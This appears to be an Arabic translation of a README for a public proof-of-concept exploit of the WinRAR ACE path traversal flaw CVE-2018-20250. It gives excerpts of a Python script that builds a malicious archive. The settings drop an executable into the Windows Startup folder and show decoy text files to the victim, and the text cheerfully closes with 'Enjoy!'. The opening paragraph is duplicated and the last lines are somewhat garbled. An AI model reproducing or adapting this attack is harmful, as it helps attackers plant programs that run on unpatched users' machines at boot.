
WinRar هو برنامج معروف جداً لنظام Windows. الإصدار السابق من WinRaR كان يحتوي على ثغرة أمنية تم إصلاحها في فبراير 2019. معظم الأشخاص لم يقوموا بتحديث WinRAR لذا فهم عرضة لثغرة تجاوز المسار المطلق [CVE-2018-20250]
WinRar هو برنامج معروف جداً على نطاق واسع لنظام ويندوز. الإصدارات السابقة من WinRaR كانت تحوي ثغرة أمنية تم إصلاحها في فبراير 2019. معظم الأشخاص لم يقوموا بتحديث winrar لذلك لا يزالون عرضة لثغرة مسار الاختراق المطلق (Absolute Path Traversal) هذه [CVE-2018-20250]
استغلال لـ استخراج تنفيذ الكود من Winrar
poc بواسطة Ridter
كيف تستخدمها؟
كل ما تحتاجه هو تثبيت بايثون 3.7، وتجهيز ملف خبيث تريد تشغيله، وضبط القيم التي تريدها، سوف تقوم سكربت الاستغلال هذا بتوليد ملف الأرشيف الخبيث تلقائياً!
... ...
# اسم ملف الأرشيف الذي تريده
rar_filename = "test.rar"
# الملف الخبيث الذي تريده أن يعمل
evil_filename = "calc.exe"
# مسار فك الضغط الذي تريده، كما هو موضح بالأسفل
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# ملفات أخرى لتظهر عند فتح الضحية لملف الـ winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]
... ...
def get_right_hdr_crc(filename):
# هذا الأمر قد يختلف، يعتمد على بيئة بايثون 3 الخاصة بك.
p = os.popen('py -3 acefile.py --headers %s'%(filename))
res = p.read()
pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
result = pattern.findall(res)
right_hdr_crc = result[0].upper()
return hex2raw4(right_hdr_crc)
... ...
test.rar تلقائياًtest.rar، سيرى الملف hello.txt و world.txt، يمكنك أيضاً إضافة المزيد من الملفات، ملفات أكثر جاذبية.![]()
hi.exe، لكنه في الحقيقة calc.exe. عندما يعيد تشغيل الحاسوب، سيتم تشغيل hi.exe.![]()
استمتع! :)